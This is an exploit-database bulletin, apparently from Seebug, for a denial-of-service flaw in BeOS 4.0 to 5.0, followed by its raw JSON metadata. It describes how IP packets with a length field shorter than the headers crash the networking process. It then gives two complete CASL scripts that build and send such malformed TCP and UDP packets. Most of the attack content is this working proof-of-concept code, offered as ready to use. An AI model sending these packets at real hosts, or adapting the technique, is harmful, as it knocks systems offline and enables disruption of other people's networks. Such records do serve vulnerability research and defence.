Be BeOS 4.0/4.5/5.0 IP Packet Length Field Vulnerability
2014-07-01T00:00:00
ID SSV:73752 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/1100/info
The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28.
--------------becasl.casl--------------------
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet = [ IPH ];
ip_output(packet);
--------------becasl1.casl--------------------
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;
packet = [ IPH ];
ip_output(packet);
{"lastseen": "2017-11-19T13:40:19", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T13:40:19"}, "dependencies": {"references": [], "modified": "2017-11-19T13:40:19"}, "vulnersScore": 0.0}, "href": "https://www.seebug.org/vuldb/ssvid-73752", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:73752", "title": "Be BeOS 4.0/4.5/5.0 IP Packet Length Field Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 0, "sourceData": "\n source: http://www.securityfocus.com/bid/1100/info\r\n\r\nThe networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28. \r\n\r\n--------------becasl.casl--------------------\r\n\r\n#!/usr/local/casl/bin/casl\r\n\r\n #include "tcpip.casl"\r\n #include "packets.casl"\r\n #include "tcp.casl"\r\n\r\n srchost = 10.0.0.1;\r\n dsthost = 10.0.0.2;\r\n\r\n IPH = copy TCPIP;\r\n \r\n IPH.ip_hl = 5;\r\n IPH.ip_src = srchost;\r\n IPH.ip_dst = dsthost;\r\n IPH.ip_length = 39;\r\n \r\n packet = [ IPH ];\r\n ip_output(packet);\r\n\r\n--------------becasl1.casl--------------------\r\n\r\n #!/usr/local/casl/bin/casl\r\n\r\n #include "tcpip.casl"\r\n #include "packets.casl"\r\n #include "tcp.casl"\r\n\r\n srchost = 10.0.0.1;\r\n dsthost = 10.0.0.2;\r\n\r\n IPH = copy UDPIP;\r\n\r\n IPH.ip_hl = 5;\r\n IPH.ip_src = srchost;\r\n IPH.ip_dst = dsthost;\r\n IPH.ip_length = 27;\r\n\r\n packet = [ IPH ];\r\n ip_output(packet);\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73752", "type": "seebug", "objectVersion": "1.4"}